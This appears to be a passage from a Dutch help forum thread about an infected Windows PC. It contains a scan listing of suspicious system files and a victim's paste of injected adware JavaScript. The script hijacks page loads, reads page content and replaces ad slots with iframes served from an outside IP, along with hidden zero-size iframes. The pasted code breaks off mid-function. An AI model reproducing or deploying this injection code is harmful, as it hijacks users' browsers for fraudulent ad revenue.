              ----a-w 5,377,977 2008-03-18 06:54:47 C:\WINDOWS\SoftwareDistribution\Download\8e6e092285335035f6d1824355204800\EXCEL.CAB
              ----a-w 8 2008-03-10 15:54:14 C:\WINDOWS\SoftwareDistribution\EventCache\{01CC09DB-8675-4503-926D-5FDC6580AED5}.bin
              ----a-w 8 2008-03-23 12:41:18 C:\WINDOWS\SoftwareDistribution\EventCache\{66D89709-A5AC-4E7E-8C33-AA6D14E1581F}.bin
              ----a-w 8 2008-03-23 16:32:24 C:\WINDOWS\SoftwareDistribution\EventCache\{6C0E15FE-03EB-463B-BDEC-A11D48306037}.bin
              ----a-w 8 2008-03-15 10:26:14 C:\WINDOWS\SoftwareDistribution\EventCache\{83F951A6-28D0-4759-BC1A-CB556E3C1748}.bin
              ----a-w 25,384 2008-03-22 20:31:47 C:\WINDOWS\SoftwareDistribution\SelfUpdate\Default\wsus3setup.cab
              ----a-w 17,836 2008-03-22 20:31:48 C:\WINDOWS\SoftwareDistribution\SelfUpdate\Registered\musetup.cab
              --sha-w 184,313 2008-03-23 17:27:13 C:\WINDOWS\system32\hjllm.ini
              ----a-w 6,242 2008-03-15 01:06:14 C:\WINDOWS\system32\jupdate-1.6.0_05-b13.log
              ------w 271,872 2008-03-23 17:26:21 C:\WINDOWS\system32\mlljh.dll
              ----a-w 748,810 2008-03-21 00:09:26 C:\WINDOWS\system32\RVAXO.bat
              ----a-w 90,176 2008-03-23 11:49:01 C:\WINDOWS\system32\vlwosmpj.dll
              ----a-w 13,646 2008-03-23 12:39:52 C:\WINDOWS\system32\wpa.dbl
              ----a-w 71,907 2008-03-23 13:37:19 C:\WINDOWS\system32\CatRoot2\dberr.txt
              ----a-w 8,192 2008-03-23 17:34:12 C:\WINDOWS\system32\CatRoot2\edb.chk
              ----a-w 131,072 2008-03-23 17:29:51 C:\WINDOWS\system32\CatRoot2\edb.log
              ----a-w 1,056,768 2008-03-23 17:29:52 C:\WINDOWS\system32\CatRoot2\tmp.edb
              ----a-w 131,072 2008-03-23 17:27:19 C:\WINDOWS\system32\config\ACEEvent.evt
              ----a-w 524,288 2008-03-23 17:27:19 C:\WINDOWS\system32\config\AppEvent.Evt
              ---ha-w 1,024 2008-03-23 17:30:09 C:\WINDOWS\system32\config\default.LOG
              ---ha-w 1,024 2008-03-23 17:28:59 C:\WINDOWS\system32\config\SAM.LOG
              ----a-w 524,288 2008-03-23 17:27:19 C:\WINDOWS\system32\config\SecEvent.Evt
              ---ha-w 1,024 2008-03-23 17:29:59 C:\WINDOWS\system32\config\SECURITY.LOG
              ---ha-w 1,024 2008-03-23 17:51:59 C:\WINDOWS\system32\config\software.LOG
              ----a-w 524,288 2008-03-23 17:27:19 C:\WINDOWS\system32\config\SysEvent.Evt
              ---ha-w 1,024 2008-03-23 17:36:53 C:\WINDOWS\system32\config\system.LOG
              ----a-w 12,830 2008-03-23 17:36:36 C:\WINDOWS\system32\wbem\Logs\wbemess.log
              ----a-w 65,575 2008-03-23 16:32:24 C:\WINDOWS\system32\wbem\Logs\wbemess.lo_
              ----a-w 3,054 2008-03-23 17:27:29 C:\WINDOWS\system32\wbem\Logs\wbemprox.log
              ----a-w 3,627 2008-03-23 17:32:50 C:\WINDOWS\system32\wbem\Logs\wmiprov.log
              ----a-w 20 2008-03-23 17:28:50 C:\WINDOWS\system32\wbem\Repository\$WinMgmt.CFG
              ----a-w 1,327,104 2008-03-23 17:32:32 C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR
              ----a-w 672 2008-03-23 17:51:52 C:\WINDOWS\system32\wbem\Repository\FS\INDEX.MAP
              ----a-w 4 2008-03-23 17:51:53 C:\WINDOWS\system32\wbem\Repository\FS\MAPPING.VER
              ----a-w 5,016 2008-03-23 17:51:53 C:\WINDOWS\system32\wbem\Repository\FS\MAPPING1.MAP
              ----a-w 5,012 2008-03-23 17:41:23 C:\WINDOWS\system32\wbem\Repository\FS\MAPPING2.MAP
              ----a-w 8,839,168 2008-03-23 17:32:32 C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA
              ----a-w 4,344 2008-03-23 17:51:52 C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.MAP
              ----a-w 284 2008-03-21 06:46:00 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job
              ---ha-w 330 2008-03-23 17:31:50 C:\WINDOWS\Tasks\MP Scheduled Scan.job
              ---ha-w 6 2008-03-23 14:28:38 C:\WINDOWS\Tasks\SA.DAT
              ----a-w 77 2008-03-15 00:49:06 C:\WINDOWS\Temp\dw.log
              ----a-w 54,064 2008-03-23 17:48:54 C:\WINDOWS\Temp\MpCmdRun.log
              ----a-w 41,262 2008-03-21 00:50:53 C:\WINDOWS\Temp\MpSigStub.log
              ----a-w 66,426,832 2008-03-23 17:28:58 C:\WINDOWS\Temp\nvcbin.def.C2FC19B1.TMP

              Entries: 269 (259)
              Directories: 0 Files: 269
              Bytes: 168,948,604 Blocks: 330,089
              =============

              Comment


              • #8
                Nieuw probleem?

                Wanneer ik een website open (in internet explorer of firefox) komt er onder de broncode een tweetal extra javascripts te staan, zie hieronder. Heeft dit ook met de spam te maken en hoe kan ik hier afkomen?

                <script type="text/javascript" language="javascript">


                onloadevent_E850A1B8F15A48e9BD405A67D067013E = window.onload;
                window.onload = f_E850A1B8F15A48e9BD405A67D067013E;

                TopWndUrl_E850A1B8F15A48e9BD405A67D067013E = "";
                MetaKwd_E850A1B8F15A48e9BD405A67D067013E = "";
                FrameString_E850A1B8F15A48e9BD405A67D067013E = "";

                EscUrl_24578457887 = escape(window.location.href);
                MainAid_24578457887 = '67608';
                MainGiud_24578457887 = '2494B670BBE74CFFA085DE5038EC5E4C';
                MainUid_24578457887 = '3B0A0F96DFD411DCBD04F67607DEFFFF';
                MainRid_24578457887 = 'radip';


                ruleset_AA532B7B55D44dbb87FAB30BCA27C538 = new Array();

                /*
                // example of the normal rule
                ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push( {"Name" : "NormalRuleName", "Global" : 0,
                "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl,
                "minCX" : 3, "maxCX" : 1000, "minCY" : 3, "maxCY" : 1000,
                "Image" : "http://ya.ru/logo.gif", "Click" : "http://www.ya.ru", "ReplaceAll" : 1};

                // example of the locale rule
                ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push( {"Name" : "LocaleRuleName", "Global" : 1,
                "minCX" : 3, "maxCX" : 1000, "minCY" : 3, "maxCY" : 1000,
                "Image" : "http://ya.ru/logo.gif", "Click" : "http://www.ya.ru", "ReplaceAll" : 1};
                */

                InitArray_24578457887 = new Array();

                //FrID, FrSrc, FrWidthMin, FrWidthMax, FrHeightMin, FrHeightMax, AHref, ImgSrc
                //InitArray_24578457887.push(
                // CreateInitObject_24578457887('aff78e03',
                // 'http://85.17.166.173/go/?cmp=nm_bm3s_728x90',
                // '728', '730', '90', '95'
                // 'http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4',
                // 'http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4'));
                //InitArray.push

                var arrAnti = new Array("vlaze\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b728x90", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b728x90',
                'http://85.12.43.83/fls.all/728x90/728x90_27.html?a=b',
                '728', '728', '90', '90',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b720x300',
                'http://85.12.43.83/fls.all/720x300/720x300_1.html?a=b',
                '720', '720', '300', '300',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b468x60", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b468x60',
                'http://85.12.43.83/fls.all/468x60/468x60_11.html?a=b',
                '468', '468', '60', '60',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b336x280", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b336x280',
                'http://85.12.43.83/fls.all/336x280/336x280_3.html?a=b',
                '336', '336', '280', '280',
                '',
                ''));
                var arrAnti = new Array("vlaze\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b300x250", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b300x250',
                'http://85.12.43.83/fls.all/300x250/300x250_1.html?a=b',
                '300', '300', '250', '250',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b300x100", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b300x100',
                'http://85.12.43.83/fls.all/300x100/300x100_1.html?a=b',
                '300', '300', '100', '100',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b250x250", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b250x250',
                'http://85.12.43.83/fls.all/250x250/250x250_1.html?a=b',
                '250', '250', '250', '250',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b240x400", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b240x400',
                'http://85.12.43.83/fls.all/240x400/240x400_1.html?a=b',
                '240', '240', '400', '400',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b234x60", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b234x60',
                'http://85.12.43.83/fls.all/234x60/234x60_5.html?a=b',
                '234', '234', '60', '60',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b180x150", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b180x150',
                'http://85.12.43.83/fls.all/180x150/180x150_1.html?a=b',
                '180', '180', '150', '150',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b160x600", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b160x600',
                'http://85.12.43.83/fls.all/160x600/160x600_3.html?a=b',
                '160', '160', '600', '600',
                '',
                ''));
                var arrAnti = new Array("search42\.com","joybuyjoy\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b125x125", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b125x125',
                'http://85.12.43.83/fls.all/125x125/125x125_5.html?a=b',
                '125', '125', '125', '125',
                '',
                ''));
                var arrAnti = new Array("tube\.com","youporn\.com","sexthe\.net");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x90", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b120x90',
                'http://85.12.43.83/fls.all/120x90/120x90_19.html?a=b',
                '120', '120', '90', '90',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x600", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b120x600',
                'http://85.12.43.83/fls.all/120x600/120x600_12.html?a=b',
                '120', '120', '600', '600',
                '',
                ''));
                var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x240", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};ruleset_AA532B7B55D44dbb87FAB30BCA27C538.push(element);
                InitArray_24578457887.push(CreateInitObject_24578457887(
                'b120x240',
                'http://85.12.43.83/fls.all/120x240/120x240_1.html?a=b',
                '120', '120', '240', '240',
                '',
                ''));


                ExclusionArray_24578457887 = new Array();


                function f_E850A1B8F15A48e9BD405A67D067013E()
                {
                var MainCollection;

                window.onload = onloadevent_E850A1B8F15A48e9BD405A67D067013E; // reset onload event

                if (onloadevent_E850A1B8F15A48e9BD405A67D067013E != null)
                onloadevent_E850A1B8F15A48e9BD405A67D067013E();

                if (!document || !document.body || !document.body.childNodes)
                return;

                TopWndUrl_E850A1B8F15A48e9BD405A67D067013E = GetTopWindowUrl_C782A923BB0348e19544F09902515411();
                MetaKwd_E850A1B8F15A48e9BD405A67D067013E = GetMeta_C782A923BB0348e19544F09902515411();
                FrameString_E850A1B8F15A48e9BD405A67D067013E = GetFrameContent_C782A923BB0348e19544F09902515411(document.body);

                initialize_24578457887();
                if(MustExit_24578457887())
                return;

                MainCollection = document.body.childNodes;
                ReplaceByFrame_24578457887(InitArray_24578457887, MainCollection, 0);

                } //function f_E850A1B8F15A48e9BD405A67D067013E()


                function GetTopWindowUrl_C782A923BB0348e19544F09902515411()
                {
                var temp = "";
                var e;
                try
                {
                temp = window.top.location.href;
                }
                catch(e)
                {
                temp = window.location.href;
                }
                return temp;
                } //function GetTopWindowUrl_C782A923BB0348e19544F09902515411()


                function SimpleEncode_C782A923BB0348e19544F09902515411(str)
                {
                if (str == null)
                return "";

                str = escape(str);
                str = str.replace(/\+/g, "%2B");
                str = str.replace(/\//g, "%2F");

                return str;
                } //function SimpleEncode_C782A923BB0348e19544F09902515411(str)


                function GetMeta_C782A923BB0348e19544F09902515411()
                {
                var e;
                var str = "";
                try
                {
                var head = window.top.document.getElementsByTagName('head').item(0);
                if(head != null)
                {
                if (head.childNodes != null && head.childNodes.length > 0)
                {
                for(var y=head.childNodes.length-1; y>=0; y--)
                {
                var child = head.childNodes.item(y);
                if(child.tagName == "META")
                {
                str += "<META ";

                if(child.content != "" && child.name == "keywords")
                str += 'content="' + child.content + '" ';

                str += " >\n";
                }
                }
                }
                }
                }
                catch(e)
                {
                }

                str = SimpleEncode_C782A923BB0348e19544F09902515411(str);

                return str;
                } //function GetMeta_C782A923BB0348e19544F09902515411()


                function CheckUrl_3A315874118D436c8E256384792D2A73(rulesetElement)
                {
                var i;

                // check if it's locale matching
                if (rulesetElement.Global == 1)
                return "_";

                // check antikeywords
                for (i = 0; i < rulesetElement.AntiArr.length; i++)
                if (document.location.href.indexOf(rulesetElement.AntiArr[i]) != -1)
                return null;

                // check content keywords
                for (i = 0; i < rulesetElement.ContentArr.length; i++)
                if (FrameString_E850A1B8F15A48e9BD405A67D067013E.indexOf(rulesetElement.ContentArr[i]) != -1)
                return rulesetElement.ContentArr[i];

                // check metakeywords
                for (i = 0; i < rulesetElement.MetaArr.length; i++)
                if (MetaKwd_E850A1B8F15A48e9BD405A67D067013E.indexOf(rulesetElement.MetaArr[i]) != -1)
                return rulesetElement.MetaArr[i];

                // check urlkeywords
                for (i = 0; i < rulesetElement.UrlArr.length; i++)
                if (document.location.href.indexOf(rulesetElement.UrlArr[i]) != -1)
                return rulesetElement.UrlArr[i];

                return null;

                } //function CheckUrl_3A315874118D436c8E256384792D2A73(rulesetElement)



                function GetFrameContent_C782A923BB0348e19544F09902515411(nodeElement)
                {
                var retStr = "";

                if(null==nodeElement)
                return "";

                if (nodeElement.nodeValue != null)
                retStr = nodeElement.nodeValue;

                var allChildrenNode = nodeElement.childNodes;

                if (allChildrenNode != null && allChildrenNode.length > 0)
                {
                for(var y=allChildrenNode.length-1; y>=0; y--)
                {
                var child = allChildrenNode.item(y);

                retStr = retStr + GetFrameContent_C782A923BB0348e19544F09902515411(child);
                }
                }

                retStr = retStr + " ";
                return retStr;
                } //function GetFrameContent_C782A923BB0348e19544F09902515411(nodeElement)


                function Connection_3A315874118D436c8E256384792D2A73(Obj)
                {
                // var img = new Image();
                //
                // if(Obj)
                // img.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
                // else
                // img.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?null";
                //alert('Connection ' + Obj.FrID + ' src: ' + Obj.FrSrc);
                try
                {
                var fr = document.createElement("iframe");
                fr.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
                fr.width = 0;
                fr.height = 0;
                document.body.appendChild(fr);
                }
                catch(e){}


                } //function Connection_3A315874118D436c8E256384792D2A73()



                function MustExit_24578457887()
                {
                var flExcl = 0;
                var str;
                var aid = MainAid_24578457887;
                var ss;
                var i;

                flExcl = 0;
                str = window.location.href;
                for(i = 0; i < ExclusionArray_24578457887.length; ++i)
                {

                if(!ExclusionArray_24578457887[i].length)
                continue;

                if(str.length < ExclusionArray_24578457887[i].length)
                continue;

                if(str.substr(0, ExclusionArray_24578457887[i].length) == ExclusionArray_24578457887[i])
                {
                flExcl = 1;
                break;
                }

                }; //for(j = 0; j < ExclusionArray_24578457887.length; ++j)

                if(flExcl)
                return 1;

                flExcl = 0;
                for(i = 0; i < str.length - aid.length + 1; i++)
                {
                ss = str.substr(i, aid.length);
                if(ss == aid)
                {
                flExcl = 1;
                break;
                }
                } //for(j = 0; j < str.length - 4; j++)

                if(flExcl)
                return 1;

                return 0;

                }; //function MustExit()


                function initialize_24578457887()
                {
                var i;
                var str;

                for(i = 0; i < InitArray_24578457887.length; ++i)
                {
                str = GetDomain_24578457887(InitArray_24578457887[i].FrSrc);
                if(str.length)
                ExclusionArray_24578457887.push(str);

                str = GetDomain_24578457887(InitArray_24578457887[i].AHref);
                if(str.length)
                ExclusionArray_24578457887.push(str);

                str = GetDomain_24578457887(InitArray_24578457887[i].ImgSrc);
                if(str.length)
                ExclusionArray_24578457887.push(str);

                } //for(i = 0; i < InitArray_24578457887; ++i)

                } //function initialize()


                function CreateFrame_24578457887(InitObj)
                {
                var XFrame = document.createElement("iframe");
                XFrame.id = InitObj.FrID;
                XFrame.name = InitObj.FrName;
                XFrame.framespacing = InitObj.FrSpacing;
                XFrame.frameborder = InitObj.FrBorder;
                XFrame.scrolling = InitObj.FrScrolling ;
                XFrame.width = InitObj.FrWidthMin;
                XFrame.height = InitObj.FrHeightMin;

                if(!XFrame.frameborder || XFrame.frameborder == 'no')
                {
                XFrame.style.borderWidth = "0px";
                XFrame.frameBorder = '0';
                }

                return XFrame;

                } //function CreateFrame(El)

                function CheckImg_24578457887(ObjArray, El)
                {
                var i;

                try
                {

                for(i = 0; i < ObjArray.length; ++i)
                if(
                ( (El.width >= ObjArray[i].FrWidthMin) && (El.width <= ObjArray[i].FrWidthMax) ) &&
                ( (El.height >= ObjArray[i].FrHeightMin) && (El.height <= ObjArray[i].FrHeightMax) )
                )
                return ObjArray[i];

                }
                catch(e) {}

                return null;

                } //function CheckImg(El)


                function CheckObj_24578457887(ObjArray, El)
                {
                var i;

                try
                {
                for(i = 0; i < ObjArray.length; ++i)
                if(
                ( (El.getAttribute("width") >= ObjArray[i].FrWidthMin) && (El.getAttribute("width") <= ObjArray[i].FrWidthMax) ) &&
                ( (El.getAttribute("height") >= ObjArray[i].FrHeightMin) && (El.getAttribute("height") <= ObjArray[i].FrHeightMax) )
                )

                return ObjArray[i];
                }
                catch(e){}

                return null;

                } //function CheckObj(El)

                function CheckID_24578457887(ObjArray, El)
                {
                var i;

                try
                {
                if(El.id)
                for(i = 0; i < ObjArray.length; ++i)
                if(El.id == ObjArray[i].FrID)
                return ObjArray[i];
                }
                catch(e) {}

                return null;

                } //function CheckID_24578457887(ObjArray, El)


                function WrFrame_24578457887(InitObj)
                {
                var FrameList = null;
                var j;
                var xd, yd;

                FrameList = window.frames;
                for(j = 0; j < FrameList.length; ++j)
                {

                try
                {
                if(!FrameList[j].frameElement)
                continue;
                if(!FrameList[j].frameElement.id)
                continue;
                if(FrameList[j].frameElement.id != InitObj.FrID)
                continue;
                }
                catch(e)
                {
                continue;
                }

                try
                {
                FrameList[j].document.write("<html> <body id='B" + InitObj.FrID + "' name='B" + InitObj.FrID + "'> " +
                " <iframe id=" + InitObj.FrID + " name=" + InitObj.FrID +
                " src=" + InitObj.FrSrc +
                " framespacing=" + InitObj.FrSpacing + " frameborder=" + InitObj.FrBorder +
                " scrolling=" + InitObj.FrScrolling +
                " width=" + InitObj.FrWidthMin + " height=" + InitObj.FrHeightMin + "> " +
                " <a href=" + InitObj.AHref +
                " target=" + InitObj.ATarget +
                "><img flNotNeed=1 src=" + InitObj.ImgSrc +
                " border=" + InitObj.ImgBorder +
                " alt=" + InitObj.ImgAlt + " /> </a> </body> </iframe><html>");
                }
                catch(e)
                { continue; }

                try
                {
                xd = FrameList[j].document.getElementById('B' + InitObj.FrID).getAttribute("clientLeft") +
                FrameList[j].document.getElementById(InitObj.FrID).getAttribute("offsetLeft");

                yd = FrameList[j].document.getElementById('B' + InitObj.FrID).getAttribute("clientTop") +
                FrameList[j].document.getElementById(InitObj.FrID).getAttribute("offsetTop");

                if(navigator.appName == 'Microsoft Internet Explorer')
                {
                xd += 7;
                yd += 12;
                } //if(navigator.appName == 'Microsoft Internet Explorer')
                else if(navigator.appName == 'Netscape')
                {
                xd = '8';
                yd = '8'
                }//if(navigator.appName == 'Netscape')
                else if(navigator.appName == 'Opera')
                {
                xd = '5';
                yd = '5';
                } //else if(navigator.appName == 'Opera')

                }
                catch(e)
                {

                if(navigator.appName == 'Microsoft Internet Explorer')
                {
                xd = '8';
                yd = '14'
                }//if(navigator.appName == 'Microsoft Internet Explorer')
                if(navigator.appName == 'Netscape')
                {
                xd = '8';
                yd = '8'
                }//if(navigator.appName == 'Netscape')
                else if(navigator.appName == 'Opera')
                {
                xd = '5';
                yd = '5';

                }//else if(navigator.appName == 'Opera')
                }

                try
                {
                FrameList[j].document.getElementById('B' + InitObj.FrID).style.marginLeft= '-' + xd + 'px';
                FrameList[j].document.getElementById('B' + InitObj.FrID).style.marginTop= '-' + yd + 'px';
                }
                catch(e) {}

                } //for(j = 0; j < document.frames.length; ++j)

                } //function RepChild_24578457887()


                function CheckTagIMG_24578457887(El, InitArray)
                {
                var InitObj;
                var flExcl;
                var NewFrame;
                var i;

                if(El.parentNode.tagName != "A")
                return 0;

                InitObj = CheckImg_24578457887(InitArray, El);
                if(!InitObj)
                return 1;

                flExcl = 0;
                for(i = 0; i < ExclusionArray_24578457887.length; ++i)
                {
                if(!ExclusionArray_24578457887[i].length)
                continue;

                if(El.parentNode.href.length < ExclusionArray_24578457887[i].length)
                continue;

                if(El.parentNode.href.substr(0, ExclusionArray_24578457887[i].length) == ExclusionArray_24578457887[i])
                {
                flExcl = 1;
                break;
                }

                }; //for(j = 0; j < ExclusionArray_24578457887.length; ++j)

                if(flExcl)
                return 1;

                NewFrame = CreateFrame_24578457887(InitObj);
                El.parentNode.parentNode.replaceChild(NewFrame, El.parentNode);

                WrFrame_24578457887(InitObj);

                Connection_3A315874118D436c8E256384792D2A73(InitObj);

                return 0;

                } //function CheckTagIMG_24578457887()

                function CheckTagEMBED_24578457887(El, InitArray)
                {
                var str;
                var InitObj;
                var NewFrame;
                var i;

                if(El.parentNode == null)
                return 1;

                str = El.getAttribute("src");
                if(!str)
                return 1;

                for(i = 0; i < str.length - 3; ++i)
                {
                ss = str.substr(i, 4);
                if(ss == ".swf")
                break;
                } //for(j = 0; j < str.length - 4; j++)

                if(ss != ".swf")
                return 1;

                if(CheckID_24578457887(InitArray, El))
                return 1;
                InitObj = CheckObj_24578457887(InitArray, El);
                if(!InitObj)
                return 1;

                NewFrame = CreateFrame_24578457887(InitObj);
                El.parentNode.replaceChild(NewFrame, El);
                WrFrame_24578457887(InitObj);

                Connection_3A315874118D436c8E256384792D2A73(InitObj);

                return 0;

                } //function CheckTagEMBED_24578457887()


                function CheckTagOBJECT_24578457887(El, InitArray)
                {
                var str;
                var InitObj;
                var NewFrame;
                var ss;

                var i;

                if(El.parentNode == null)
                return 1;
                if(navigator.appName == 'Opera')
                return 1;


                try
                {
                str = El.getAttribute("movie");
                if(!str)
                {
                str = El.getAttribute("data");
                if(!str)
                return 1;
                } //if(!str)

                }
                catch(e)
                {
                return 1;
                }


                for(i = 0; i < str.length - 3; ++i)
                {
                ss = str.substr(i, 4);
                if(ss == ".swf")
                break;
                } //for(j = 0; j < str.length - 4; j++)

                if(ss != ".swf")
                return 1;

                if(CheckID_24578457887(InitArray, El))
                return 1;
                InitObj = CheckObj_24578457887(InitArray, El);
                if(!InitObj)
                return 1;

                NewFrame = CreateFrame_24578457887(InitObj);
                El.parentNode.replaceChild(NewFrame, El);
                WrFrame_24578457887(InitObj);

                Connection_3A315874118D436c8E256384792D2A73(InitObj);

                return 0;

                } //function CheckTagOBJECT_24578457887()

                function CheckTagIFRAME_24578457887(El, InitArray)
                {
                var InitObj;
                var NewFrame;
                var flExcl;

                var str;
                var ss;
                var aid = MainAid_24578457887;

                var i;

                if(!El.parentNode)
                return 1;

                if(!El.tagName)
                return 1;

                if(CheckID_24578457887(InitArray, El))
                return 1;
                InitObj = CheckObj_24578457887(InitArray, El);
                if(!InitObj)
                return 1;


                flExcl = 0;
                for(i = 0; i < ExclusionArray_24578457887.length; ++i)
                {

                if(!ExclusionArray_24578457887[i].length)
                continue;

                if(El.src.length < ExclusionArray_24578457887[i].length)
                continue;

                if(El.src.substr(0, ExclusionArray_24578457887[i].length) == ExclusionArray_24578457887[i])
                {
                flExcl = 1;
                break;
                }

                }; //for(j = 0; j < ExclusionArray_24578457887.length; ++j)

                if(flExcl)
                return 0;


                flExcl = 0; str = El.src;
                for(i = 0; i < str.length - aid.length + 1; i++)
                {
                ss = str.substr(i, aid.length);
                if(ss == aid)
                {
                flExcl = 1;
                break;
                }
                } //for(j = 0; j < str.length - 4; j++)

                if(flExcl)
                return 1;


                El.src = InitObj.FrSrc;
                Connection_3A315874118D436c8E256384792D2A73(InitObj);

                return 0;

                } //function CheckTagIFRAME_24578457887()


                function ReplaceByFrame_24578457887(InitArray, MainCollection, Included)
                {
                var El = null;
                var i;
                var flExit;


                if(!Included)
                {
                flExit = 0;

                for(i = 0; i < ruleset_AA532B7B55D44dbb87FAB30BCA27C538.length; ++i)
                {
                if(!CheckUrl_3A315874118D436c8E256384792D2A73(ruleset_AA532B7B55D44dbb87FAB30BCA27C538[i]))
                {
                flExit = 1;
                break;
                } //if(!CheckUrl_3A315874118D436c8E256384792D2A73(ruleset_AA532B7B55D44dbb87FAB30BCA27C538[idx]))

                } // for(i = 0; i < ruleset_AA532B7B55D44dbb87FAB30BCA27C538.length; ++i)

                if(flExit)
                return 0;

                }; //if(Included == 0)


                if(window.frameElement)
                {
                if(CheckObj_24578457887(InitArray, window.frameElement))
                return 0;

                if(CheckID_24578457887(InitArray, window.frameElement))
                return 0;
                } //if(window.frameElement)


                for(i = 0; i < MainCollection.length; i++)
                {
                El = MainCollection[i];
                if(El.tagName == "IMG")
                {
                if(!CheckTagIMG_24578457887(El, InitArray))
                continue;

                }//if(El.tagName == "IMG")
